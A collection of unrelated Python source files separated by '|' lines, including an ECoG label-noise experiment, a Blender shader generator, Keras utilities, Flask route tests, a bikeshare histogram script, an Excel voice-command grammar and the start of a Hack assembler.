NOTE: this is a Python 2 script (bare print statements); run it with python2.
"""
import numpy as np
from DataNexus.datahandler import DataHandler
from DataNexus.fourier import Fourier
from sklearn.ensemble import RandomForestClassifier
import random
# load the preprocessed ECoG data
train_data = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/train_data.npy")
train_labels = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/train_labels.npy")
test_data = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/test_data.npy")
test_labels = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/test_labels.npy")
#train_data = train_data[:30,:,:]
#train_labels = train_labels[:30]
#test_data = test_data[:30,:,:]
#test_labels = test_labels[:30]
# split the training data into two halves
# fh stands for the first half
# sh stands for the second half
#fh_data, fh_labels, sh_data, sh_labels = DataHandler.split(0.5, train_data, train_labels)
#np.save("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/sh_labels.npy", sh_labels)
# load precomputed Fourier features for the second half and the test set
fourier_sh_data = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/fourier_sh_data.npy")
fourier_test_data = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/fourier_test_data.npy")
sh_labels = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/sh_labels.npy")
# flip a fraction (wrong_ratio, currently 10%) of the labels to simulate noisy answers
# (an earlier comment claimed 42%, which no longer matches wrong_ratio below)
wrong_ratio = 0.10
wrong_idx = random.sample(range(len(sh_labels)), int(wrong_ratio * len(sh_labels)))
sh_labels_orig = list(sh_labels)
# 0**label maps 0 -> 1 and 1 -> 0, i.e. flips a binary label in place
sh_labels[wrong_idx] = 0**sh_labels[wrong_idx]
print "Accuracy of the labels is %f" % (np.sum(sh_labels == sh_labels_orig) / float(len(sh_labels_orig)))
# flip the same fraction of the test labels
wrong_idx_test = random.sample(range(len(test_labels)), int(wrong_ratio * len(test_labels)))
test_labels_orig = list(test_labels)
test_labels[wrong_idx_test] = 0**test_labels[wrong_idx_test]
# apply fourier transform on the second 50% of the training set
#fourier_sh_data = Fourier.data_to_fourier(sh_data)
#fourier_test_data = Fourier.data_to_fourier(test_data)
#np.save("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/fourier_sh_data.npy", fourier_sh_data)
#np.save("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/fourier_test_data.npy", fourier_test_data)
#exit()
# augment fourier results of the second 50% train with the (noisy) labels, producing an enriched dataset
enriched_sh_data = np.hstack((fourier_sh_data, sh_labels.reshape(len(sh_labels), 1)))
enriched_test_data = np.hstack((fourier_test_data, test_labels.reshape(len(test_labels), 1)))
#enriched_sh_data = fourier_sh_data
#enriched_test_data = fourier_test_data
# train RF on the enriched dataset (targets are the original, clean labels)
rf = RandomForestClassifier(n_estimators=500)
rf.fit(enriched_sh_data, sh_labels_orig)
# evaluate RF on the train and test sets
print str(rf.score(enriched_sh_data, sh_labels_orig)) + " - accuracy on train data"
print str(rf.score(enriched_test_data, test_labels_orig)) + " - accuracy on test data"
print "Importance of the features"
print list(rf.feature_importances_)[-5:]
|
import bpy
def write(vert, frag):
    """Emit GLSL for clustered point/spot light shading into the given
    vertex (*vert*) and fragment (*frag*) shader builders.

    Uniforms and shadow-map samplers are registered according to the world
    defs ('_ShadowMap', '_ShadowMapAtlas', '_SingleAtlas', '_Spot', ...),
    then a per-cluster light loop is written that accumulates into `direct`.
    NOTE(review): assumes the surrounding fragment shader already defines
    wposition, n, vVec, dotNV, albedo, roughness, specular and f0 (and
    voxels/voxpos for the voxel-shadow path) — confirm at the call site.
    """
    wrd = bpy.data.worlds['Arm']
    # Feature flags derived from the world defs
    is_shadows = '_ShadowMap' in wrd.world_defs
    is_shadows_atlas = '_ShadowMapAtlas' in wrd.world_defs
    is_single_atlas = '_SingleAtlas' in wrd.world_defs
    frag.add_include_front('std/clusters.glsl')
    frag.add_uniform('vec2 cameraProj', link='_cameraPlaneProj')
    frag.add_uniform('vec2 cameraPlane', link='_cameraPlane')
    # Each light occupies 3 consecutive vec4 entries in lightsArray
    frag.add_uniform('vec4 lightsArray[maxLights * 3]', link='_lightsArray')
    frag.add_uniform('sampler2D clustersData', link='_clustersData')
    if is_shadows:
        frag.add_uniform('bool receiveShadow')
        frag.add_uniform('vec2 lightProj', link='_lightPlaneProj', included=True)
        if is_shadows_atlas:
            # Separate point-light atlas unless everything shares a single atlas
            if not is_single_atlas:
                frag.add_uniform('sampler2DShadow shadowMapAtlasPoint', included=True)
            else:
                frag.add_uniform('sampler2DShadow shadowMapAtlas', top=True)
            frag.add_uniform('vec4 pointLightDataArray[maxLightsCluster]', link='_pointLightsAtlasArray', included=True)
        else:
            frag.add_uniform('samplerCubeShadow shadowMapPoint[4]', included=True)
    vert.add_out('vec4 wvpposition')
    vert.write('wvpposition = gl_Position;')
    # wvpposition.z / wvpposition.w
    frag.write('float viewz = linearize(gl_FragCoord.z, cameraProj);')
    frag.write('int clusterI = getClusterI((wvpposition.xy / wvpposition.w) * 0.5 + 0.5, viewz, cameraPlane);')
    frag.write('int numLights = int(texelFetch(clustersData, ivec2(clusterI, 0), 0).r * 255);')
    frag.write('#ifdef HLSL')
    frag.write('viewz += texture(clustersData, vec2(0.0)).r * 1e-9;') # TODO: krafix bug, needs to generate sampler
    frag.write('#endif')
    if '_Spot' in wrd.world_defs:
        frag.add_uniform('vec4 lightsArraySpot[maxLights]', link='_lightsArraySpot')
        frag.write('int numSpots = int(texelFetch(clustersData, ivec2(clusterI, 1 + maxLightsCluster), 0).r * 255);')
        frag.write('int numPoints = numLights - numSpots;')
        if is_shadows:
            if is_shadows_atlas:
                if not is_single_atlas:
                    frag.add_uniform('sampler2DShadow shadowMapAtlasSpot', included=True)
                else:
                    frag.add_uniform('sampler2DShadow shadowMapAtlas', top=True)
            else:
                frag.add_uniform('sampler2DShadow shadowMapSpot[4]', included=True)
            # FIXME: type is actually mat4, but otherwise it will not be set as floats when writing the shaders' json files
            frag.add_uniform('vec4 LWVPSpotArray[maxLightsCluster]', link='_biasLightWorldViewProjectionMatrixSpotArray', included=True)
    # Per-cluster light loop: fetch the light index, then accumulate its contribution
    frag.write('for (int i = 0; i < min(numLights, maxLightsCluster); i++) {')
    frag.write('int li = int(texelFetch(clustersData, ivec2(clusterI, i + 1), 0).r * 255);')
    frag.write('direct += sampleLight(')
    frag.write('    wposition,')
    frag.write('    n,')
    frag.write('    vVec,')
    frag.write('    dotNV,')
    frag.write('    lightsArray[li * 3].xyz,') # lp
    frag.write('    lightsArray[li * 3 + 1].xyz,') # lightCol
    frag.write('    albedo,')
    frag.write('    roughness,')
    frag.write('    specular,')
    frag.write('    f0')
    if is_shadows:
        frag.write('\t, li, lightsArray[li * 3 + 2].x, lightsArray[li * 3 + 2].z != 0.0') # bias
    if '_Spot' in wrd.world_defs:
        frag.write('\t, lightsArray[li * 3 + 2].y != 0.0')
        frag.write('\t, lightsArray[li * 3 + 2].y') # cutoff
        frag.write('\t, lightsArraySpot[li].w') # cutoff - exponent
        frag.write('\t, lightsArraySpot[li].xyz') # spotDir
    if '_VoxelShadow' in wrd.world_defs and '_VoxelAOvar' in wrd.world_defs:
        frag.write(' , voxels, voxpos')
    frag.write(');')
    frag.write('}') # for numLights
|
"""
Utility functions for use in neural network construction and processing
"""
from keras.callbacks import EarlyStopping
from keras.models import Sequential
from keras.layers import Dense
from keras.callbacks import Callback
from keras import initializers
import keras.backend as K
from keras.constraints import maxnorm
from keras.layers import Layer
import tensorflow as tf
import logging
import matplotlib; matplotlib.use('Agg') # allow backend matplotlib without setting environment variables
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import roc_curve, auc
from sklearn.preprocessing import label_binarize
import pandas as pd
####################
#
# Global variables for model / backprop
#
EPOCHS = 200 #300 standard number of epochs BEFORE stopping early
LEARNING_RATE = 0.001 # standard learning rate, for static LR only
BATCH_SIZE = 200
VERBOSE_LEVEL = 0 # not verbose
DROPOUT_RATE = 0.5
# Fraction of the training data held out for validation. fit_model() below
# referenced this constant but it was never defined, causing a NameError.
VALIDATION_SPLIT = 0.2
####################
#
# Final nodes for regression models. All classification models use softmax
#
def fit_model(model, train_data_x, train_data_y, validation_split=0.2):
    """
    Fit *model* on the training data, stopping early when validation loss
    stalls.

    Parameters: model — a compiled keras model; train_data_x / train_data_y —
    training inputs and targets; validation_split — fraction of the training
    data held out for validation (new keyword with a default, so existing
    callers are unaffected; the previous code referenced a module-level
    VALIDATION_SPLIT that was never defined and raised NameError at call time).

    Returns the keras History object produced by model.fit.
    """
    log = logging.getLogger('model.fit')
    log.info('model.fit')
    # stop when validation loss has not improved for 20 consecutive epochs
    early_stop = EarlyStopping(monitor='val_loss', patience=20)
    log.info('model currently fitting. This might take a while...')
    history = model.fit(train_data_x, train_data_y,
                        epochs = EPOCHS,
                        validation_split = validation_split,
                        batch_size = BATCH_SIZE,
                        verbose = VERBOSE_LEVEL,
                        callbacks = [early_stop, PrintDot()])
    return history
def get_base_optimizer():
    """
    Return the optimizer shared by all models.

    Adagrad was chosen for its stochastic properties.
    """
    optimizer = tf.train.AdagradOptimizer(LEARNING_RATE)
    return optimizer
def get_base_initializer():
    """
    Return the weight initializer shared by all models (Glorot normal).
    """
    initializer = initializers.glorot_normal()
    return initializer
def get_base_regularizer():
    '''
    TODO
    Base regularizer. Not yet implemented; currently yields None.
    '''
    return None
def build_base_model(input_length, round=False):
    """
    Builds a base model with nodes derived from a typical DNN for regression.

    Parameters: input_length — number of input features; round — when True,
    append a Round layer so predictions are integer-valued.
    Returns a compiled keras Sequential model (MSE loss, MAE metric).
    """
    log = logging.getLogger('build_base_model')
    log.info('build_base_model')
    # Fixes two defects in the hidden layer: `kernel_initalizer` was a typo
    # (an unknown kwarg raises TypeError inside Keras), and Dense units must
    # be an int, so use floor division for input_length // 2.
    model = Sequential([
        Dense(input_length+1, kernel_initializer = get_base_initializer(), activation=tf.nn.relu,input_shape=(input_length,)),
        Dense(input_length // 2, kernel_initializer = get_base_initializer(), activation=tf.nn.relu),
        Dense(1, activation='linear')
    ])
    if round:
        model.add(Round())
    optimizer = get_base_optimizer()
    model.compile(loss='mse',
                  optimizer = optimizer,
                  metrics=['mae'])
    return model
def build_shallow_model(input_length, round=False):
    """
    Build a shallow network that approximates a linear regressor.

    One hidden ReLU layer feeds a single linear output unit; optionally a
    Round layer is appended so predictions are integer-valued.
    """
    log = logging.getLogger('build_shallow_model')
    log.info('build_shallow_model')
    layers = [
        Dense(input_length + 1,
              kernel_initializer=get_base_initializer(),
              activation=tf.nn.relu,
              input_shape=(input_length,)),
        Dense(1, activation='linear'),
    ]
    model = Sequential(layers)
    if round:
        model.add(Round())
    model.compile(loss='mse',
                  optimizer=get_base_optimizer(),
                  metrics=['mae'])
    return model
def build_abstract_softmax_classification_model(input_length, nodes, num_classes):
    """
    Build a user-defined classifier from the `nodes` layer-width list.

    The final layer is a softmax over `num_classes` classes and training uses
    sparse categorical cross-entropy.
    """
    log = logging.getLogger('build_abstract_softmax_classification_model')
    log.info('build_abstract_softmax_classification_model. Classes = %s' % num_classes)
    layers = [
        Dense(input_length + 1,
              activation=tf.nn.relu,
              input_shape=(input_length,),
              kernel_constraint=maxnorm(3))
    ]
    for width in nodes:
        layers.append(Dense(width,
                            kernel_initializer=get_base_initializer(),
                            activation=tf.nn.relu,
                            kernel_constraint=maxnorm(3)))
    model = Sequential(layers)
    model.add(Dense(int(num_classes), activation=tf.nn.softmax))
    model.compile(optimizer=get_base_optimizer(),
                  loss='sparse_categorical_crossentropy',
                  metrics=['accuracy'])
    return model
def build_abstract_model(input_length, nodes, round=False):
    """
    Abstracted regression model that is user-defined based on the nodes
    parameter (a list of hidden-layer widths).

    Returns a compiled keras Sequential model (MSE loss, MAE metric); when
    `round` is True the scalar output is rounded to the nearest integer.
    """
    log = logging.getLogger('build_abstract_model')
    log.info('build_abstract_model')
    node_list = [
        Dense(input_length+1,
              activation=tf.nn.relu,
              input_shape=(input_length,))
    ]
    node_list.extend([Dense(x, kernel_initializer = get_base_initializer(), activation=tf.nn.relu) for x in nodes])
    model = Sequential(node_list)
    # Always collapse to a single linear output unit. Previously the `round`
    # branch skipped this layer, leaving the output at the width of the last
    # hidden layer — inconsistent with build_base_model, which rounds AFTER
    # the Dense(1, 'linear') output.
    model.add(Dense(1, activation='linear'))
    if round:
        model.add(Round())
    optimizer = get_base_optimizer()
    model.compile(loss='mse',
                  optimizer = optimizer,
                  metrics=['mae'])
    return model
def plot_epoch_history(history, y_label = "y_units", title = 'EpochHistory.png'):
    """
    Plot training accuracy and training loss against epoch count.

    Parameters: history — the keras History object returned by model.fit
    (must contain the 'acc' and 'loss' series); y_label — y-axis label;
    title — file name the figure is saved under.
    Saves the figure to `title`; returns None.
    """
    # The module already imports matplotlib with the 'Agg' backend and numpy
    # at the top of the file; the previous local re-imports, the `chain`
    # import and the unused y_max computation were dead code and are removed.
    plt.figure()
    plt.xlabel('Epoch')
    plt.ylabel(y_label)
    acc = np.array(history.history['acc'])
    loss = np.array(history.history['loss'])
    plt.plot(history.epoch, acc,
             label='Train accuracy')
    plt.plot(history.epoch, loss,
             label = 'Train loss')
    plt.legend()
    plt.ylim([0, 1])
    plt.savefig(title)
def save_data(name, dataframe):
    """
    Save a pandas dataframe as CSV at path `name` (without the index column).

    Returns True on success, False if the write failed.
    """
    try:
        dataframe.to_csv(name, index=False)
        return True
    except Exception:
        # The previous bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt; only I/O-style failures should map to False.
        return False
class PrintDot(Callback):
    """Keras callback that echoes training progress to stdout as dots."""
    def on_epoch_end(self, epoch, logs):
        import sys
        # start a fresh line every 100 epochs, then emit one dot per epoch
        start_new_row = (epoch % 100 == 0)
        if start_new_row:
            sys.stdout.write('\n')
        sys.stdout.write('.')
class Round(Layer):
    """Custom layer that rounds its input element-wise (old Keras Layer API)."""
    def __init__(self, **kwargs):
        super(Round, self).__init__(**kwargs)
    def get_output(self, train=False):
        inputs = self.get_input(train)
        return K.round(inputs)
    def get_config(self):
        # merge this layer's config on top of the base layer config
        merged = dict(super(Round, self).get_config())
        merged.update({"name": self.__class__.__name__})
        return merged
def get_micro_auc(y_true, y_probas, classes):
    """
    Compute the micro-averaged ROC curve and its AUC.

    y_true — true labels; y_probas — per-class probability arrays;
    classes — ordered class labels used for binarization.
    Returns (fpr, tpr, roc_auc).
    """
    y_bin = label_binarize(y_true, classes=classes)
    if len(classes) == 2:
        # label_binarize yields a single column for binary problems;
        # stack its complement so both classes get a column
        y_bin = np.hstack((1 - y_bin, y_bin))
    flat_probas = np.concatenate(y_probas).ravel().tolist()
    fpr, tpr, _ = roc_curve(y_bin.ravel(), flat_probas)
    return fpr, tpr, auc(fpr, tpr)
# Import-only utility module; nothing to run directly.
if __name__ == '__main__':
    pass
|
# Copyright 2020 Siu-Kei Muk (David). All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import flask
from absl.testing import parameterized
import unittest
from unittest import mock
from core import configs
from core import models
from core import utils
from core.routes import patch_routes
from core.routes import restful_test_base
class PatchRoutesURLRuleTestCase(unittest.TestCase):
  """Verifies that PatchRoute registers the expected URL rule on the app."""

  def setUp(self):
    self._app = mock.create_autospec(flask.Flask)

  def verify_route(self, route, rule):
    # Applying the route must register `rule` with the PATCH method only.
    route.apply(self._app)
    self._app.route.assert_called_with(rule, methods=["PATCH"])

  def testPatchActorRule(self):
    self.verify_route(patch_routes.PatchRoute("actor"),
                      "/actors/<int:actor_id>")

  def testPatchMovieRule(self):
    self.verify_route(patch_routes.PatchRoute("movie"),
                      "/movies/<int:movie_id>")
class PatchRoutesTestCase(
    restful_test_base.RestfulRouteTestBase, parameterized.TestCase):
  """End-to-end tests of the PATCH /actors/<id> and /movies/<id> endpoints.

  Each parameterized happy-path test patches a subset of fields and checks
  that patched fields change while omitted fields keep their stored value.
  """

  def create_app(self):
    # Build a test-mode app with both PATCH routes registered.
    app = utils.create_app_stub(__name__, configs.AppConfig(mode="test"))
    patch_routes.PatchRoute("actor").apply(app)
    patch_routes.PatchRoute("movie").apply(app)
    return app

  @restful_test_base.generate(name=[None, "Test Patch Actor"],
                              age=[None, 10, 30, 60],
                              gender=[None, "M", "F"],
                              movies=[None, [1]])
  def testPatchActor(self, name=None, age=None, gender=None, movies=None):
    # None means "do not send this field"; the endpoint must then preserve
    # the actor's stored value.
    actor = models.Actor.query.get(1)
    data = {}
    if name:
      data["name"] = name
    else:
      name = actor.name
    if age:
      data["age"] = age
    else:
      age = actor.age
    if gender:
      data["gender"] = gender
    else:
      gender = actor.gender
    if movies:
      data["movies"] = movies
      # Resolve the sent ids to the expected response payload, sorted by id.
      movies = [models.Movie.query.get(mid) for mid in movies]
      movies = sorted(({"id": m.id, "title": m.title} for m in movies),
                      key=lambda d: d["id"])
    else:
      movies = sorted(({"id": m.id, "title": m.title} for m in actor.movies),
                      key=lambda d: d["id"])
    res = self.client.patch("/actors/1", json=data)
    self.assertEqual(res.status_code, 200)
    self.assertTrue(res.is_json)
    res_data = res.json
    self.assertEqual(res_data["success"], True)
    res_actor = res_data["actor"]
    self.assertEqual(res_actor["name"], name)
    self.assertEqual(res_actor["age"], age)
    self.assertEqual(res_actor["gender"], gender)
    self.assertListEqual(
        sorted(res_actor["movies"], key=lambda d: d["id"]), movies)

  def testPatchActorNotExist(self):
    # Unknown actor id -> 404
    res = self.client.patch("/actors/2", json={})
    self.compare_json(res, 404, restful_test_base.ERROR_404)

  def testPatchActorInvalidInputKey(self):
    # Unknown field in the payload -> 400
    res = self.client.patch("/actors/1", json={"invalid": "invalid"})
    self.compare_json(res, 400, restful_test_base.ERROR_400)

  def testPatchActorInvalidAge(self):
    res = self.client.patch("/actors/1", json={"age": "invalid"})
    self.compare_json(res, 400, restful_test_base.ERROR_400)

  def testPatchActorInvalidGender(self):
    # Well-formed but semantically invalid value -> 422
    res = self.client.patch("/actors/1", json={"gender": "invalid"})
    self.compare_json(res, 422, restful_test_base.ERROR_422)

  def testPatchActorInvalidMovies(self):
    res = self.client.patch("/actors/1", json={"movies": "invalid"})
    self.compare_json(res, 400, restful_test_base.ERROR_400)

  def testPatchActorNonExistMovies(self):
    res = self.client.patch("/actors/1", json={"movies": [2]})
    self.compare_json(res, 422, restful_test_base.ERROR_422)

  @restful_test_base.generate(title=[None, "Test Patch Title"],
                              release_date=[None, "1970-01-01", "2019-07-21"],
                              actors=[None, [1]])
  def testPatchMovie(self, title=None, release_date=None, actors=None):
    # Mirrors testPatchActor for the movie resource.
    movie = models.Movie.query.get(1)
    data = {}
    if title:
      data["title"] = title
    else:
      title = movie.title
    if release_date:
      data["release_date"] = release_date
    else:
      release_date = movie.release_date.isoformat()
    if actors:
      data["actors"] = actors
      actors = [models.Actor.query.get(aid) for aid in actors]
      actors = sorted(({"id": a.id, "name": a.name} for a in actors),
                      key=lambda d: d["id"])
    else:
      actors = sorted(({"id": a.id, "name": a.name} for a in movie.actors),
                      key=lambda d: d["id"])
    res = self.client.patch("/movies/1", json=data)
    self.assertEqual(res.status_code, 200)
    self.assertTrue(res.is_json)
    res_data = res.json
    self.assertEqual(res_data["success"], True)
    res_movie = res_data["movie"]
    self.assertEqual(res_movie["title"], title)
    self.assertEqual(res_movie["release_date"], release_date)
    self.assertListEqual(
        sorted(res_movie["actors"], key=lambda d: d["id"]), actors)

  def testPatchMovieNotExist(self):
    res = self.client.patch("/movies/2", json={})
    self.compare_json(res, 404, restful_test_base.ERROR_404)

  def testPatchMovieInvalidInputKey(self):
    res = self.client.patch("/movies/1", json={"invalid": "invalid"})
    self.compare_json(res, 400, restful_test_base.ERROR_400)

  def testPatchMovieInvalidReleaseDate(self):
    res = self.client.patch("/movies/1", json={"release_date": "invalid"})
    self.compare_json(res, 422, restful_test_base.ERROR_422)

  def testPatchMovieInvalidActors(self):
    res = self.client.patch("/movies/1", json={"actors": "invalid"})
    self.compare_json(res, 400, restful_test_base.ERROR_400)

  def testPatchMovieNonExistActors(self):
    res = self.client.patch("/movies/1", json={"actors": [2]})
    self.compare_json(res, 422, restful_test_base.ERROR_422)
# Run the test suite when executed directly.
if __name__ == '__main__':
  unittest.main()
|
import os
import numpy as np
import matplotlib.pyplot as plt
# Input: quarterly trip-history CSV exports
data_path = './data/bikeshare/'
data_filenames = ['2017-q1_trip_history_data.csv', '2017-q2_trip_history_data.csv',
                  '2017-q3_trip_history_data.csv', '2017-q4_trip_history_data.csv']
# Output directory for the generated figure
output_path = './output'
if not os.path.exists(output_path):
    os.makedirs(output_path)
# Histogram parameters: duration range (minutes) and number of bins
hist_range = (0, 180)
n_bins = 12
def collect_and_process_data():
    """
    Step 1+2: data collection and processing.

    Loads the quarterly trip CSVs, keeps only ride duration and member type,
    and returns the ride durations (in minutes) separately for members and
    casual riders as two float arrays.
    """
    year_duration_member_type_list = []
    for data_filename in data_filenames:
        data_file = os.path.join(data_path, data_filename)
        data_arr = np.loadtxt(data_file, delimiter=',', dtype='str', skiprows=1)
        # Strip the double quotes surrounding the CSV fields
        # Ride duration (first column)
        duration_col = np.core.defchararray.replace(data_arr[:, 0], '"', '')
        duration_col = duration_col.reshape(-1, 1)
        # Member type (last column)
        member_type_col = np.core.defchararray.replace(data_arr[:, -1], '"', '')
        member_type_col = member_type_col.reshape(-1, 1)
        duration_member_type_arr = np.concatenate([duration_col, member_type_col], axis=1)
        year_duration_member_type_list.append(duration_member_type_arr)
    year_duration_member_type_arr = np.concatenate(year_duration_member_type_list, axis=0)
    # Split the rows by rider type
    member_arr = year_duration_member_type_arr[year_duration_member_type_arr[:, 1] == 'Member']
    casual_arr = year_duration_member_type_arr[year_duration_member_type_arr[:, 1] == 'Casual']
    # /1000/60 suggests raw durations are milliseconds converted to minutes —
    # NOTE(review): confirm the unit against the raw CSV schema
    year_member_duration = member_arr[:, 0].astype('float') / 1000 / 60
    year_casual_duration = casual_arr[:, 0].astype('float') / 1000 / 60
    return year_member_duration, year_casual_duration
def analyze_data(year_member_duration, year_casual_duration):
    """
    Step 3: data analysis.

    Histogram the member and casual ride durations (minutes) using the
    module-level hist_range / n_bins and print counts plus bin edges.
    """
    member_hist, member_edges = np.histogram(
        year_member_duration, range=hist_range, bins=n_bins)
    casual_hist, casual_edges = np.histogram(
        year_casual_duration, range=hist_range, bins=n_bins)
    print('会员直方图统计信息:{}, 直方图分组边界:{}'.format(member_hist, member_edges))
    print('非会员直方图统计信息:{}, 直方图分组边界:{}'.format(casual_hist, casual_edges))
def save_and_show_results(year_member_duration, year_casual_duration):
    """
    Step 4: present the results.

    Draws side-by-side duration histograms for member and casual riders,
    saves the figure into the output directory and shows it on screen.
    """
    fig = plt.figure(figsize=(10, 5))
    ax1 = fig.add_subplot(1, 2, 1)
    # Share the y axis so both histograms are directly comparable
    ax2 = fig.add_subplot(1, 2, 2, sharey=ax1)
    # Member histogram
    ax1.hist(year_member_duration, range=hist_range, bins=n_bins)
    ax1.set_xticks(range(0, 181, 15))
    ax1.set_title('Member')
    ax1.set_ylabel('Count')
    # Casual (non-member) histogram
    ax2.hist(year_casual_duration, range=hist_range, bins=n_bins)
    ax2.set_xticks(range(0, 181, 15))
    ax2.set_title('Casual')
    ax2.set_ylabel('Count')
    plt.tight_layout()
    plt.savefig(os.path.join(output_path, 'type_histogram.png'))
    plt.show()
def main():
    """
    Entry point: run collection/processing, analysis and presentation.
    """
    # Step 1 + 2: data collection and processing
    year_member_duration, year_casual_duration = collect_and_process_data()
    # Step 3: data analysis
    analyze_data(year_member_duration, year_casual_duration)
    # Step 4: save and display the histograms
    save_and_show_results(year_member_duration, year_casual_duration)
if __name__ == '__main__':
    main()
|
"""
Command-module for Microsoft Excel
You also can find some good vocola commands for Excel on Mark Lillibridge's Github:
https://github.com/mdbridge/bit-bucket/tree/master/voice/my_commands/commands
Alex Boche 2019
"""
# this function takes a dictionary and returns a dictionary whose keys are sequences of keys of the original dictionary
# and whose values are the corresponding sequences of values of the original dictionary
from dragonfly import Repeat, Dictation, Choice, MappingRule, Repetition
from castervoice.rules.core.alphabet_rules import alphabet_support # Manually change in port in if in user directory
from castervoice.lib.actions import Text, Key
from castervoice.lib.ctrl.mgr.rule_details import RuleDetails
from castervoice.lib.merge.additions import IntegerRefST
from castervoice.lib.merge.state.short import R
class ExcelRule(MappingRule):
    """Voice-command grammar for Microsoft Excel.

    Maps spoken phrases to keystroke sequences (navigation, selection,
    insertion and formatting). Cell/range commands spell columns with the
    caster alphabet via the Repetition extras below.
    """
    mapping = {
        "next sheet [<n>]":
            R(Key("c-pgdown"))*Repeat(extra='n'),
        "(prior | previous) sheet [<n>]":
            R(Key("c-pgup"))*Repeat(extra='n'),
        "[select] cell <column_1> <row_1>":
            R(Key("c-g") + Text("%(column_1)s%(row_1)s") + Key("enter")),
        "select <column_1> <row_1> through <column_2> <row_2>":
            R(Key("c-g") + Text("%(column_1)s%(row_1)s:%(column_2)s%(row_2)s") +
              Key("enter")),
        "go to cell":
            R(Key("c-g")),
        "select current column":
            R(Key("c-space")),
        "select current row":
            R(Key("s-space")),
        "top of column":
            R(Key("c-up")),
        "beginning of row":
            R(Key("c-left")),
        "insert stuff":
            R(Key("cs-plus")),
        "insert row":
            R(Key("cs-plus, a-r, enter")),
        "insert column":
            R(Key("cs-plus, a-c, enter")),
        "insert cell [to the] left":
            R(Key("cs-plus, a-i, enter")),
        "insert cell above":
            R(Key("cs-plus, a-d, enter")),
        "insert pivot table":
            R(Key("a-n, v")),
        "insert pivot chart":
            R(Key("a-n, s, z, c")),
        "add-ins":
            R(Key("a-t, i")),
        "add border":
            R(Key("cs-ampersand")),
        "arrange Windows":
            R(Key("a-w/10, a")),
        "auto sum":
            R(Key("a-equal")),
        "freeze panes":
            R(Key("a-w, f")),
        # From Mark Lillibridge regarding the edit cell command below:
        # There are at least two modes, edit (blue background) and enter (yellow background).
        # In enter mode for formulas, arrow keys select a
        # cell (range if shifted), whereas in edit mode, they move the cursor
        # inside the formula. For non-formulas, in enter mode, the arrows
        # finished entering the current cell and move to another cell.
        #
        # and "edit cell" initially switch to edit mode then
        # toggle thereafter for the given cell. Typing initially puts you in
        # enter mode.
        #
        # edit cell: always edits directly in cell (blue background)
        #
        # this has the effect of pressing F2 without DNS around.
        #
        # Want "edit directly in cell" option turned off:
        # Office button->advanced-> turn off allow editing directly in cells
        # (Dragon handles edit in cell directly badly)
        #
        # First time, edits current cell via formula bar. Unlike with
        # editing directly in a cell, this highlights ranges and cells used.
        "toggle edit cell":
            R(Key("f2")),
    }
    extras = [
        Dictation("dict"),
        IntegerRefST("n", 1, 10),
        IntegerRefST("row_1", 1, 100),
        IntegerRefST("row_2", 1, 100),
        # change max to 3 if you want sequences of length three and so on
        Repetition(Choice("alphabet1", alphabet_support.caster_alphabet()), min=1, max=2, name="column_1"),
        Repetition(Choice("alphabet2", alphabet_support.caster_alphabet()), min=1, max=2, name="column_2")
    ]
    defaults = {"n": 1, "dict": ""}
def get_rule():
    """Expose ExcelRule to Caster, bound to the Excel executable."""
    return ExcelRule, RuleDetails(name="excel", executable="excel")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 15 14:33:56 2019
@author: khalilsleimi
Notation: ** A raw assembly file is a (*.asm) with comments(single line and multiline) and empty lines, and spaces in actual commands (we suppose a command per line at most)
** A Clean Assembly file is a (Clean_*.asm) containing no comments or empty lines or spaces, just one command per line
** A Translatable file is a (Translatable_*.asm) with no labels or symbolic variables, just known memory locations and instructions locations
             ** A Translatable Command is a string that can be taken from a line of a Translatable file (i.e. one satisfying that file's conditions)
** A Hack Machine Language Command is a command that can be executed on the Hack computer
"""
def CleanAssembly(FileName, CleanFileName):
    """
    Input: Takes in a raw assembly file FileName (given by its name: a string).
           Takes a Clean Assembly file (given by its name: a string).
    Output: Produce a Clean Assembly File. Saved in CleanFileName
    Purpose: Strip all comments, empty lines and spaces from the file, leaving
             exactly one newline-terminated command per line in CleanFileName.
    """
    with open(FileName, 'r') as to_clean:
        raw_lines = to_clean.readlines()
    commands = []
    for line in raw_lines:
        command = ExtractCommand(line)
        # ExtractCommand returns just "\n" for blank or comment-only lines
        # (including comments preceded by whitespace, which the old
        # `line[0:2] != "//"` filter missed); drop those.
        if command != '\n':
            commands.append(command)
    # Keep each command's trailing newline: the old code stripped it from
    # every entry, gluing the whole clean file onto a single line, which
    # broke TranslatableAssembly's per-line parsing ("one command per line").
    with open(CleanFileName, 'w') as save_in:
        save_in.writelines(commands)
"for now just a simple Comments handlers"
def ExtractCommand(line):
    """
    Input: a line that might contain a command and some comment
    Output: the command itself, newline-terminated ("\\n" alone if no command)
    Purpose: extract the command by stripping surrounding whitespace and any
             trailing "//" comment.
    """
    line = line.lstrip()
    # Only cut at "//" when a comment is actually present: str.find returns
    # -1 when the substring is absent, and the old line[:line.find("//")]
    # then silently dropped the command's last character (e.g. a final file
    # line without a trailing newline). The unused `result` local is removed.
    comment_start = line.find("//")
    if comment_start != -1:
        line = line[:comment_start]
    line = line.rstrip()
    return line + '\n'
def TranslatableAssembly(CleanFileName, TranslatableFileName):
    """
    Input: Takes a Clean Assembly file (given by its name: a string).
           Takes a TranslatableFileName (given by its name: a string).
    Output: Produce a Translatable Assembly file. Saved in TranslatableFileName
